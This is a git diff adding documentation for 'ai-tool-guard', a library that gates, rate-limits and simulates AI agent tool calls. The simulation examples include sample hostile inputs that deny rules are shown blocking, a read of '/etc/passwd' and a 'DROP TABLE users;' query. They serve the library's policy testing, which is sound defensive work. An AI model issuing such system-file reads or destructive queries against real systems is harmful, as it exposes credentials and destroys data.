| `deny` | +| `critical` | `deny` | + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => { + // Implement your approval channel here. + return { approved: true, approvedBy: "ops-team" }; + }, +}); +``` + +All three rules use `priority: 0` and `toolPatterns: ["*"]`, so they act as a global baseline. Higher-priority custom rules take precedence due to escalation semantics. + +### `readOnlyPolicy(readToolPatterns)` + +Allows the tools whose names match any of the supplied glob patterns and denies every other tool call. Useful for read-only agents that must never write or delete data. + +```ts +import { createToolGuard, readOnlyPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: readOnlyPolicy(["read*", "get*", "list*", "search*", "db.query"]), +}); +``` + +The function produces two rules: + +1. An `allow` rule at `priority: 10` matching the supplied patterns. +2. A `deny` rule at `priority: 0` matching `"*"` (catch-all). + +Because the allow rule has higher priority, matching tools pass through before the catch-all deny is reached. + +## Configuration Options + +### `SimpleRuleOptions` + +All three builder functions accept the same options object: + +| Property | Type | Required | Description | +|---|---|---|---| +| `tools` | `string \| string[]` | Yes | Tool name glob pattern(s). A single string is treated as a one-element array. | +| `riskLevels` | `RiskLevel[]` | No | Restrict the rule to specific risk tiers. | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise` | No | Optional async predicate. | +| `description` | `string` | No | Human-readable description written to `DecisionRecord.reason`. | +| `priority` | `number` | No | Evaluation order. Higher values are evaluated first. Default `0`. | + +Each builder auto-generates a stable `id` with a prefix indicating the verdict (`allow-N`, `deny-N`, `require-approval-N`). + +## Advanced Examples + +### Admin vs. Viewer Policies + +Compose builders to produce role-specific policy bundles and select the right one at runtime: + +```ts +import { allow, deny, requireApproval } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +function adminPolicy(): PolicyRule[] { + return [ + allow({ + tools: "*", + riskLevels: ["low", "medium"], + description: "Admins may use low and medium risk tools freely.", + priority: 10, + }), + requireApproval({ + tools: "*", + riskLevels: ["high"], + description: "High-risk tools require a second admin to approve.", + priority: 10, + }), + deny({ + tools: "*", + riskLevels: ["critical"], + description: "Critical tools are blocked for everyone, including admins.", + priority: 20, + }), + ]; +} + +function viewerPolicy(): PolicyRule[] { + return [ + allow({ + tools: ["read*", "get*", "list*", "search*"], + description: "Viewers may use read-only tools.", + priority: 10, + }), + deny({ + tools: "*", + description: "All other tools are denied for viewers.", + priority: 0, + }), + ]; +} + +// Select the policy based on the current user's role. +const userRole = await resolveRole(); +const rules = userRole === "admin" ? adminPolicy() : viewerPolicy(); + +const guard = createToolGuard({ rules }); +``` + +### Environment-Specific Policies + +Different environments often need different guard postures. Use environment variables to select a policy bundle: + +```ts +import { defaultPolicy, allow, deny, requireApproval } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +function policyForEnvironment(env: string): PolicyRule[] { + if (env === "production") { + // Production: tight defaults, everything high-risk requires approval. + return [ + ...defaultPolicy(), + requireApproval({ + tools: "*", + riskLevels: ["high"], + description: "High-risk tools always require approval in production.", + priority: 5, + }), + ]; + } + + if (env === "staging") { + // Staging: allow high-risk tools so QA can test them without approval friction. + return [ + allow({ tools: "*", riskLevels: ["low", "medium", "high"], priority: 5 }), + deny({ tools: "*", riskLevels: ["critical"], priority: 10 }), + ]; + } + + // Development: permit everything. + return [allow({ tools: "*", description: "Allow all tools in development.", priority: 0 })]; +} + +const guard = createToolGuard({ + rules: policyForEnvironment(process.env.NODE_ENV ?? "development"), +}); +``` + +### Extending `defaultPolicy()` + +Add custom rules on top of the baseline by spreading the preset and appending higher-priority overrides: + +```ts +import { defaultPolicy, deny, requireApproval } from "ai-tool-guard"; + +const rules = [ + // Override: always deny file-system tools, regardless of risk level. + deny({ + tools: ["fs.*", "*File", "*Directory"], + description: "Filesystem access is never permitted.", + priority: 100, + }), + // Override: payment tools always require approval, even if marked low-risk. + requireApproval({ + tools: "payment.*", + description: "Payment tools always require explicit approval.", + priority: 100, + }), + // Baseline for everything else. + ...defaultPolicy(), +]; +``` + +## How It Works + +The builder functions (`allow`, `deny`, `requireApproval`) are thin wrappers around the `PolicyRule` interface. Each call increments a module-level counter to generate a unique `id` with a readable prefix. The auto-generated ID is recorded in `DecisionRecord.matchedRules` so you can trace which builder call produced a given decision. + +`defaultPolicy()` and `readOnlyPolicy()` call these builders internally and return plain `PolicyRule[]` arrays — there is no special runtime type and no class hierarchy. This means the output can be spread, filtered, or sorted alongside rules you write by hand. + +!!! note "Priority gaps leave room for overrides" + The built-in presets use `priority: 0` (`defaultPolicy`) and `priority: 0` / `priority: 10` (`readOnlyPolicy`). This intentional gap means any rule you add at `priority: 5` or above will be evaluated before the preset catch-alls, giving you fine-grained override capability without having to replace the entire preset. + +## Related + +- [Policy Engine](policy-engine.md) — how rules are evaluated, matched, and escalated. +- [API Reference](../api/policy.md) — full type documentation for `PolicyRule` and builder signatures. diff --git a/docs/guides/rate-limiting.md b/docs/guides/rate-limiting.md new file mode 100644 index 0000000..a5db2c2 --- /dev/null +++ b/docs/guides/rate-limiting.md @@ -0,0 +1,271 @@ +# Rate Limiting + +Rate limiting and concurrency control protect your tools from runaway invocation loops, expensive API hammering, and resource exhaustion. ai-tool-guard provides a sliding-window rate limiter and a concurrency cap that can be configured globally with per-tool overrides. + +## Overview + +Rate limiting is handled by the `RateLimiter` class, which is instantiated internally by the guard engine. You configure limits declaratively through `GuardOptions` and `ToolGuardConfig`. The limiter tracks call timestamps and active concurrency counts per tool and enforces them on every `acquire` call. + +When a limit is exceeded, the behaviour depends on the configured strategy: either reject immediately or queue the call until a slot becomes available. + +## Basic Usage + +Set global defaults on `GuardOptions` and override per tool as needed: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [{ id: "allow-all", toolPatterns: ["*"], verdict: "allow" }], + + // Global defaults applied to every tool. + defaultRateLimit: { + maxCalls: 60, + windowMs: 60_000, // 60 calls per minute. + strategy: "reject", + }, + defaultMaxConcurrency: 5, +}); + +// This tool gets its own tighter limits. +const wrappedExpensiveTool = guard.guardTool("llmSummarize", llmSummarizeTool, { + riskLevel: "medium", + rateLimit: { + maxCalls: 5, + windowMs: 60_000, // 5 calls per minute. + strategy: "queue", // Queue excess calls instead of rejecting. + }, + maxConcurrency: 2, +}); +``` + +## Configuration Options + +### `RateLimitConfig` + +| Field | Type | Default | Description | +|---|---|---|---| +| `maxCalls` | `number` | required | Maximum number of calls allowed within the window. | +| `windowMs` | `number` | required | Window size in milliseconds. | +| `strategy` | `"reject" \| "queue"` | `"reject"` | What to do when the limit is exceeded. | + +### Global Defaults via `GuardOptions` + +| Field | Type | Description | +|---|---|---| +| `defaultRateLimit` | `RateLimitConfig` | Applied to every tool that does not specify its own `rateLimit`. | +| `defaultMaxConcurrency` | `number` | Maximum concurrent executions for any tool without an explicit `maxConcurrency`. | + +### Per-Tool Overrides via `ToolGuardConfig` + +| Field | Type | Description | +|---|---|---| +| `rateLimit` | `RateLimitConfig` | Overrides `defaultRateLimit` for this specific tool. | +| `maxConcurrency` | `number` | Overrides `defaultMaxConcurrency` for this specific tool. | + +Per-tool configuration always takes precedence over global defaults. A tool with no rate limit configuration and no global defaults has no rate limiting applied. + +### Strategies + +**`"reject"`** — When the rate limit or concurrency cap is exceeded, `acquire` returns immediately with `allowed: false`. The guard engine throws a `ToolGuardError` with `code: "rate-limited"` and includes `retryAfterMs` when available (rate limit case only — not for concurrency rejections). The tool is never executed. + +**`"queue"`** — When the rate limit or concurrency cap is exceeded, `acquire` suspends the current call until a slot opens. Calls are released in FIFO order via a per-tool queue. This provides backpressure rather than hard rejection. Use it when occasional latency is preferable to dropped calls. + +!!! warning "Queue strategy and timeouts" + Queued calls wait indefinitely for a slot. If you use the `"queue"` strategy, ensure your caller has an appropriate timeout so that a stalled queue does not block your application indefinitely. + +## `RateLimiter` Class + +The `RateLimiter` class is used internally by the guard engine. It is also exported for testing and custom integration scenarios. + +### `acquire(toolName, config, maxConcurrency?)` + +Attempt to claim a slot for the given tool: + +```typescript +import { RateLimiter } from "ai-tool-guard/guards"; + +const limiter = new RateLimiter(); + +const result = await limiter.acquire("my-tool", { + maxCalls: 10, + windowMs: 1000, + strategy: "reject", +}, /* maxConcurrency */ 3); + +if (!result.allowed) { + console.error(result.reason); + // result.retryAfterMs is set for rate limit violations (not concurrency). +} +``` + +`acquire` returns `RateLimitAcquireResult`: + +```typescript +interface RateLimitAcquireResult { + allowed: boolean; + reason?: string; // Human-readable explanation when not allowed. + retryAfterMs?: number; // Milliseconds until the oldest call leaves the window. +} +``` + +For the `"queue"` strategy, `acquire` does not return until a slot is available. The resolved `result.allowed` is always `true` in that case. + +### `release(toolName)` + +Release a concurrency slot after tool execution completes. The guard engine calls this in a `finally` block, guaranteeing cleanup even when the tool throws: + +```typescript +// Internal pattern — the guard engine does this automatically. +await limiter.acquire(toolName, config, maxConcurrency); +try { + result = await tool.execute(args); +} finally { + limiter.release(toolName); +} +``` + +Calling `release` also wakes the next queued caller (if any) for the `"queue"` strategy. + +### `getState(toolName)` + +Returns the current `RateLimitState` for a tool, useful for observability and debugging: + +```typescript +const state = limiter.getState("my-tool"); +// state.timestamps — array of call timestamps within the current window +// state.activeCalls — number of currently executing calls +``` + +### `reset()` + +Clears all state and rejects all queued callers with an error. Intended for use in tests between test cases: + +```typescript +limiter.reset(); +``` + +## Advanced Examples + +### Protecting an Expensive External API + +Cap calls to a third-party API that bills per request, and queue excess calls rather than dropping them: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard(); + +const wrappedOcrTool = guard.guardTool("ocrApi", ocrApiTool, { + riskLevel: "medium", + rateLimit: { + maxCalls: 100, + windowMs: 60_000, // 100 calls per minute matches API plan limit. + strategy: "queue", // Back-pressure excess calls. + }, + maxConcurrency: 10, // No more than 10 in-flight requests at once. +}); +``` + +With this configuration, calls beyond the 100/min window wait in the queue. As calls complete and their timestamps age out of the window, queued callers are admitted in order. + +### Preventing Runaway Tool Loops + +AI agents can enter feedback loops where a tool result causes the model to call the same tool repeatedly. A tight rate limit on high-risk tools breaks these loops before they cause damage: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [ + { + id: "require-approval-high", + toolPatterns: ["db.*"], + riskLevels: ["high", "critical"], + verdict: "require-approval", + }, + ], + defaultRateLimit: { + maxCalls: 20, + windowMs: 60_000, + strategy: "reject", + }, +}); + +const wrappedDelete = guard.guardTool("deleteRecord", deleteRecordTool, { + riskLevel: "critical", + riskCategories: ["data-delete"], + rateLimit: { + maxCalls: 3, + windowMs: 60_000, // Maximum 3 delete operations per minute. + strategy: "reject", + }, + maxConcurrency: 1, // Never run more than one delete at a time. +}); +``` + +When `strategy: "reject"` fires, the caller receives a `ToolGuardError`: + +```typescript +try { + await wrappedDelete.execute(args); +} catch (err) { + if (err instanceof ToolGuardError && err.code === "rate-limited") { + console.warn(`Rate limited: ${err.message}`); + } +} +``` + +### Observing Limiter State + +Use `getState` to expose rate limit metrics to your monitoring system: + +```typescript +import { RateLimiter } from "ai-tool-guard/guards"; + +// Access the internal limiter (if you hold a reference to it). +setInterval(() => { + const tools = ["db.query", "email.send", "payment.charge"]; + for (const tool of tools) { + const state = limiter.getState(tool); + if (state) { + metrics.gauge(`tools.${tool}.active_calls`, state.activeCalls); + metrics.gauge(`tools.${tool}.window_calls`, state.timestamps.length); + } + } +}, 5_000); +``` + +## How It Works + +### Sliding Window Algorithm + +The limiter uses a **sliding window** rather than a fixed window. On each `acquire` call: + +1. `Date.now()` is sampled as `now`. +2. The `timestamps` array for the tool is pruned: any timestamp where `now - timestamp >= windowMs` is removed. +3. If `timestamps.length >= maxCalls`, the rate limit has been hit. +4. Otherwise, `now` is appended to `timestamps` and the call is admitted. + +The sliding window avoids the burst-at-boundary problem of fixed windows. A call made at `t=59s` does not reset the counter at `t=60s`; its timestamp ages out of the window at `t=119s`. + +### Concurrency Checks + +Concurrency is tracked separately via `state.activeCalls`: + +1. After the rate limit check passes, `state.activeCalls` is compared to `maxConcurrency`. +2. If `activeCalls >= maxConcurrency`, the concurrency cap has been hit. +3. Otherwise, `activeCalls` is incremented and the call is admitted. +4. `release(toolName)` decrements `activeCalls` in the `finally` block of tool execution, guaranteeing the slot is always returned. + +Both checks happen within the same `acquire` loop, so a queued call re-evaluates both conditions when it wakes up. + +### Queue Mechanics + +When the strategy is `"queue"` and a limit is hit, `acquire` calls `enqueue(toolName)` which pushes a `{ resolve, reject }` pair onto a per-tool queue and returns a Promise. `acquire` then `await`s that Promise, suspending the caller. When `release(toolName)` is called, it shifts the first waiter off the queue and calls `resolve()`, waking the oldest queued caller. That caller re-enters the `acquire` loop and re-checks limits before being admitted. If `reset()` is called while callers are queued, all pending Promises are rejected. + +## Related + +- [API Reference — Guards](../api/guards.md) +- [Error Handling](error-handling.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/simulation.md b/docs/guides/simulation.md new file mode 100644 index 0000000..e4088a2 --- /dev/null +++ b/docs/guides/simulation.md @@ -0,0 +1,236 @@ +# Simulation and Dry-Run + +## Overview + +ai-tool-guard provides two mechanisms for evaluating policies without executing real tools: + +- **Global dry-run mode** — configure a `ToolGuard` instance with `dryRun: true` to intercept all tool calls and return a safe placeholder instead of running the underlying `execute()` function. +- **Batch simulation** — use the standalone `simulate()` function to replay a recorded trace of tool calls through a policy configuration, producing a full `SimulationResult` with per-call decisions and summary statistics. + +These features are designed for policy testing before deployment, regression testing after policy changes, and analyzing audit traces to understand what would have been blocked. + +--- + +## Basic Usage + +### Global Dry-Run + +Set `dryRun: true` on `createToolGuard`. All tools wrapped by this guard will return `{ dryRun: true, toolName, args }` instead of executing. + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + dryRun: true, +}); + +const tools = guard.guardTools({ + deleteRecord: { tool: deleteRecordTool, riskLevel: 'critical' }, +}); + +// Safe to call — no deletion happens. +const result = await tools.deleteRecord.execute({ id: '123' }, execOptions); +// result => { dryRun: true, toolName: 'deleteRecord', args: { id: '123' } } +``` + +Policy evaluation still runs in dry-run mode. `DecisionRecord`s are produced and passed to `onDecision`, and OTel spans are emitted. The only thing skipped is the actual `execute()` call. + +### Batch Simulation + +Use `simulate()` to evaluate a recorded trace against a policy without any live tool calls: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; +import type { RecordedToolCall } from 'ai-tool-guard/policy'; + +const trace: RecordedToolCall[] = [ + { toolName: 'readFile', args: { path: '/etc/passwd' } }, + { toolName: 'writeFile', args: { path: '/tmp/out.txt', content: 'hello' } }, + { toolName: 'deleteRecord', args: { id: '42' }, userAttributes: { role: 'admin' } }, +]; + +const result = await simulate(trace, { + rules: [ + { + id: 'block-sensitive-reads', + toolPatterns: ['readFile'], + verdict: 'deny', + condition: (ctx) => String(ctx.args.path).startsWith('/etc/'), + }, + ], +}); + +console.log(result.summary); +// { total: 3, allowed: 2, denied: 1, requireApproval: 0 } + +for (const { toolCall, decision } of result.blocked) { + console.log(`Blocked: ${toolCall.toolName} — ${decision.reason}`); +} +``` + +--- + +## `RecordedToolCall` + +A `RecordedToolCall` represents one entry in a simulation trace: + +```typescript +interface RecordedToolCall { + /** Name of the tool that was (or would be) called. */ + toolName: string; + /** Arguments the model supplied. */ + args: Record; + /** Optional override for user attributes during simulation. */ + userAttributes?: Record; +} +``` + +The `userAttributes` field lets you replay the same tool call under different identity contexts — for example, to verify that an admin role bypasses a restriction that blocks regular users. + +--- + +## `SimulationResult` + +`simulate()` returns a `SimulationResult`: + +```typescript +interface SimulationResult { + /** Full decision records for every tool call in the trace, in order. */ + decisions: DecisionRecord[]; + /** Aggregate counts. */ + summary: { + total: number; + allowed: number; + denied: number; + requireApproval: number; + }; + /** + * Tool calls that would not have been allowed outright. + * Includes both "deny" and "require-approval" verdicts. + */ + blocked: Array<{ + toolCall: RecordedToolCall; + decision: DecisionRecord; + }>; +} +``` + +Every element in `decisions` corresponds to the `RecordedToolCall` at the same index in the input trace. The `blocked` array is a filtered view containing only the non-`allow` decisions, paired with their originating tool call for convenient reporting. + +--- + +## `simulate()` Function Signature + +```typescript +async function simulate( + trace: RecordedToolCall[], + options: GuardOptions, + toolConfigs?: Record, +): Promise +``` + +| Parameter | Type | Description | +|---|---|---| +| `trace` | `RecordedToolCall[]` | Ordered list of tool calls to evaluate. | +| `options` | `GuardOptions` | Policy configuration: rules, backend, risk level defaults, etc. | +| `toolConfigs` | `Record` | Optional per-tool risk level and category overrides, keyed by tool name. | + +All evaluations run with `dryRun: true` internally. The `options.dryRun` flag does not need to be set explicitly. + +!!! note + `simulate()` runs evaluations sequentially in trace order, not in parallel. This matches the serial execution model of a single-threaded agent and ensures that stateful policy rules (e.g., ones that accumulate failure counts) behave consistently. + +--- + +## Use Cases + +### Testing a Policy Before Deployment + +Write a simulation test that asserts expected verdicts for known tool call patterns: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; +import { productionPolicyOptions } from './policy-config.js'; + +const result = await simulate( + [ + { toolName: 'executeSQL', args: { query: 'DROP TABLE users;' } }, + { toolName: 'executeSQL', args: { query: 'SELECT * FROM orders WHERE id = 1;' } }, + ], + productionPolicyOptions, + { + executeSQL: { riskLevel: 'high', riskCategories: ['data-delete', 'data-read'] }, + }, +); + +// Assert the destructive query is blocked. +const [dropDecision, selectDecision] = result.decisions; +console.assert(dropDecision.verdict === 'deny'); +console.assert(selectDecision.verdict === 'allow'); +``` + +### Comparing Two Policy Configurations + +Run the same trace through two different policy configurations and compare their outputs: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; + +const [resultA, resultB] = await Promise.all([ + simulate(productionTrace, policyConfigV1), + simulate(productionTrace, policyConfigV2), +]); + +const v1Denials = resultA.summary.denied; +const v2Denials = resultB.summary.denied; + +console.log(`Policy V1 denied: ${v1Denials}`); +console.log(`Policy V2 denied: ${v2Denials}`); +console.log(`Delta: ${v2Denials - v1Denials} (${v2Denials > v1Denials ? 'stricter' : 'more permissive'})`); +``` + +### Audit Analysis + +Replay a recorded production trace to understand which calls would have been blocked by a new policy: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; +import type { RecordedToolCall } from 'ai-tool-guard/policy'; + +// Load trace from audit log (e.g., written by onDecision callback). +const auditLog = JSON.parse(fs.readFileSync('audit.json', 'utf-8')); +const trace: RecordedToolCall[] = auditLog.map((entry: any) => ({ + toolName: entry.toolName, + args: entry.args, + userAttributes: entry.attributes, +})); + +const result = await simulate(trace, newPolicyOptions); + +console.log(`Replayed ${result.summary.total} calls.`); +console.log(`New policy would have blocked ${result.blocked.length} of them.`); + +for (const { toolCall, decision } of result.blocked) { + console.log(` ${toolCall.toolName}: ${decision.reason}`); +} +``` + +--- + +## How It Works + +1. `simulate()` iterates over the trace array sequentially. +2. For each `RecordedToolCall`, it constructs a `PolicyContext` with `dryRun: true` and the call's `userAttributes` (defaulting to `{}`). +3. It calls the internal `evaluatePolicy()` function with the context, the `GuardOptions`, and any per-tool config from `toolConfigs`. +4. The resulting `DecisionRecord` is collected. If the verdict is not `allow`, the call is also added to the `blocked` array. +5. After processing all calls, the summary counts are computed from the collected `decisions` array. + +No approval handlers, rate limiters, injection detectors, or output filters run during simulation. Only the policy engine is invoked. + +--- + +## Related + +- [Policy Engine](policy-engine.md) +- [API Reference — Policy](../api/policy.md) diff --git a/docs/index.md b/docs/index.md new file mode 100644 index 0000000..22886b5 --- /dev/null +++ b/docs/index.md @@ -0,0 +1,134 @@ +# ai-tool-guard + +**Policy enforcement middleware for Vercel AI SDK tool calls.** + +Intercept, validate, approve, and audit every tool invocation your AI agents make — before they execute. + +```sh +npm install ai-tool-guard +``` + +--- + +## Why ai-tool-guard? + +- **Prevent dangerous AI tool calls.** Define declarative policies that block, require approval, or silently allow tool invocations based on arguments, caller context, or external signals — before any side effect occurs. +- **Human-in-the-loop approval.** Route sensitive operations to a human reviewer (or a secondary AI) and resume execution only when explicitly approved, with support for approve-with-edits so reviewers can correct arguments mid-flight. +- **Comprehensive audit trail.** Every decision — allow, block, approve, edit — is recorded as a structured `DecisionRecord` with full argument snapshots, policy match details, timestamps, and optional OpenTelemetry spans. +- **Zero-config sensible defaults.** Drop `guardTool` around any existing Vercel AI SDK tool and get injection detection, basic argument validation, and decision logging with no additional configuration required. + +--- + +## Features + +| Feature | Description | +|---|---| +| **Policy engine** | Declarative allow/block/require-approval rules evaluated per tool call | +| **External backends** | Plug in HTTP, database, or custom `PolicyBackend` implementations | +| **Decision records** | Structured audit log of every policy decision with full context | +| **Dry-run / simulation** | Evaluate policies without executing tools, for testing and previewing | +| **Conversation-aware policies** | Policies can inspect conversation history and accumulated context | +| **Approve with edits** | Human reviewers can modify tool arguments before approving execution | +| **Approval correlation** | Track approval requests and responses across async boundaries | +| **Argument guards** | Schema-level and semantic validation of tool input arguments | +| **Injection detection** | Detect prompt injection attempts embedded in tool arguments | +| **Output filtering** | Scrub or redact sensitive data from tool return values | +| **Rate limiting** | Per-tool and per-session call-rate limits with configurable windows | +| **OpenTelemetry** | First-class OTel span and attribute instrumentation throughout the pipeline | +| **MCP drift detection** | Detect when MCP server tool schemas diverge from expected definitions | + +--- + +## Architecture + +The execution pipeline wraps each tool call in a series of composable stages: + +``` + ┌─────────────────────────────────────────────────────────────────┐ + │ createToolGuard │ + │ (configuration & backends) │ + └──────────────────────────────┬──────────────────────────────────┘ + │ + ┌────────────────▼────────────────┐ + │ guardTool / guardTools │ + │ (wraps Vercel AI SDK tools) │ + └────────────────┬────────────────┘ + │ + ┌────────────────▼────────────────┐ + │ Pipeline │ + │ │ + │ 1. Injection detection │◄── OTel span + │ 2. Argument validation │◄── OTel span + │ 3. Policy evaluation │◄── PolicyBackend + │ ├─ allow │ + │ ├─ block ──────────────────► │ DecisionRecord + │ └─ require-approval ───────► │ ApprovalRequest + │ 4. Approval flow │◄── OTel span + │ └─ approve / edit / deny │ + │ 5. Rate limit check │◄── OTel span + │ 6. Tool execution │◄── OTel span + │ 7. Output filtering │◄── OTel span + └────────────────┬────────────────┘ + │ + ┌───────────▼───────────┐ + │ Tool result │ + │ + DecisionRecord │ + └───────────────────────┘ +``` + +Every stage emits an OpenTelemetry span. Policy decisions at stage 3 are dispatched to the configured `PolicyBackend`, which can be an in-process rule set, an external HTTP service, or a custom implementation. + +--- + +## Quick Navigation + +
+ +- **Getting Started** + + Install the library, wrap your first tool, and run a guarded agent in under five minutes. + + [Getting Started](getting-started/installation.md) + +- **Guides** + + Deep dives into policies, approval flows, audit trails, rate limiting, and OTel integration. + + [Guides](guides/policy-engine.md) + +- **API Reference** + + Full TypeScript API documentation for `createToolGuard`, `guardTool`, `PolicyBackend`, and all types. + + [API Reference](api/index.md) + +- **Examples** + + Runnable example projects covering common use cases and integration patterns. + + [Examples](examples/nextjs-integration.md) + +
+ +--- + +## Installation + +```sh +npm install ai-tool-guard +``` + +!!! note "Peer dependencies" + `ai-tool-guard` requires the [Vercel AI SDK](https://sdk.vercel.ai/) (`ai`) as a peer dependency. Install it alongside if you have not already: + + ```sh + npm install ai-tool-guard ai + ``` + + TypeScript 5.0 or later is recommended. The package ships with full type declarations and targets ESM (`"type": "module"`). + +--- + +## License + +MIT. Copyright (c) Francis Eytan Dortort. See [LICENSE](https://github.com/dortort/ai-tool-guard/blob/main/LICENSE) for details. diff --git a/docs/requirements.txt b/docs/requirements.txt new file mode 100644 index 0000000..d14bca3 --- /dev/null +++ b/docs/requirements.txt @@ -0,0 +1 @@ +mkdocs-material>=9.5,<10 diff --git a/mkdocs.yml b/mkdocs.yml new file mode 100644 index 0000000..0513396 --- /dev/null +++ b/mkdocs.yml @@ -0,0 +1,91 @@ +site_name: ai-tool-guard +site_url: https://ai-tool-guard.readthedocs.io +site_description: Policy enforcement middleware for Vercel AI SDK tool calls +site_author: Francis Eytan Dortort +repo_url: https://github.com/dortort/ai-tool-guard +repo_name: dortort/ai-tool-guard +edit_uri: edit/main/docs/ + +theme: + name: material + palette: + - scheme: default + primary: indigo + accent: indigo + toggle: + icon: material/brightness-7 + name: Switch to dark mode + - scheme: slate + primary: indigo + accent: indigo + toggle: + icon: material/brightness-4 + name: Switch to light mode + features: + - navigation.sections + - navigation.expand + - navigation.tabs + - navigation.top + - content.code.copy + - content.code.annotate + - search.highlight + - search.suggest + - toc.follow + icon: + repo: fontawesome/brands/github + +markdown_extensions: + - admonition + - pymdownx.details + - pymdownx.superfences + - pymdownx.highlight: + anchor_linenums: true + line_spans: __span + pygments_lang_class: true + - pymdownx.inlinehilite + - pymdownx.tabbed: + alternate_style: true + - pymdownx.snippets + - pymdownx.emoji: + emoji_index: !!python/name:material.extensions.emoji.twemoji + emoji_generator: !!python/name:material.extensions.emoji.to_svg + - attr_list + - md_in_html + - toc: + permalink: true + +nav: + - Home: index.md + - Getting Started: + - Installation: getting-started/installation.md + - Quick Start: getting-started/quick-start.md + - Core Concepts: getting-started/concepts.md + - Guides: + - Policy Engine: guides/policy-engine.md + - Preset Policies: guides/preset-policies.md + - External Backends: guides/external-backends.md + - Approval Workflows: guides/approval-workflows.md + - Argument Validation: guides/argument-validation.md + - Injection Detection: guides/injection-detection.md + - Output Filtering: guides/output-filtering.md + - Rate Limiting: guides/rate-limiting.md + - OpenTelemetry: guides/opentelemetry.md + - MCP Drift Detection: guides/mcp-drift-detection.md + - Simulation & Dry-Run: guides/simulation.md + - Conversation-Aware Policies: guides/conversation-aware-policies.md + - Error Handling: guides/error-handling.md + - Decision Records: guides/decision-records.md + - API Reference: + - Overview: api/index.md + - Core: api/core.md + - Policy: api/policy.md + - Approval: api/approval.md + - Guards: api/guards.md + - OpenTelemetry: api/otel.md + - MCP: api/mcp.md + - Types: api/types.md + - Examples: + - Next.js Integration: examples/nextjs-integration.md + - Chatbot Safety: examples/chatbot-safety.md + - Multi-Tenant Policies: examples/multi-tenant.md + - Audit Logging: examples/audit-logging.md diff --git a/package.json b/package.json index 8c2a036..de8cda7 100644 --- a/package.json +++ b/package.json @@ -42,6 +42,8 @@ "test": "vitest run", "test:watch": "vitest", "lint": "tsc --noEmit", + "docs:build": "mkdocs build --strict", + "docs:serve": "mkdocs serve", "prepublishOnly": "npm run build" }, "repository": {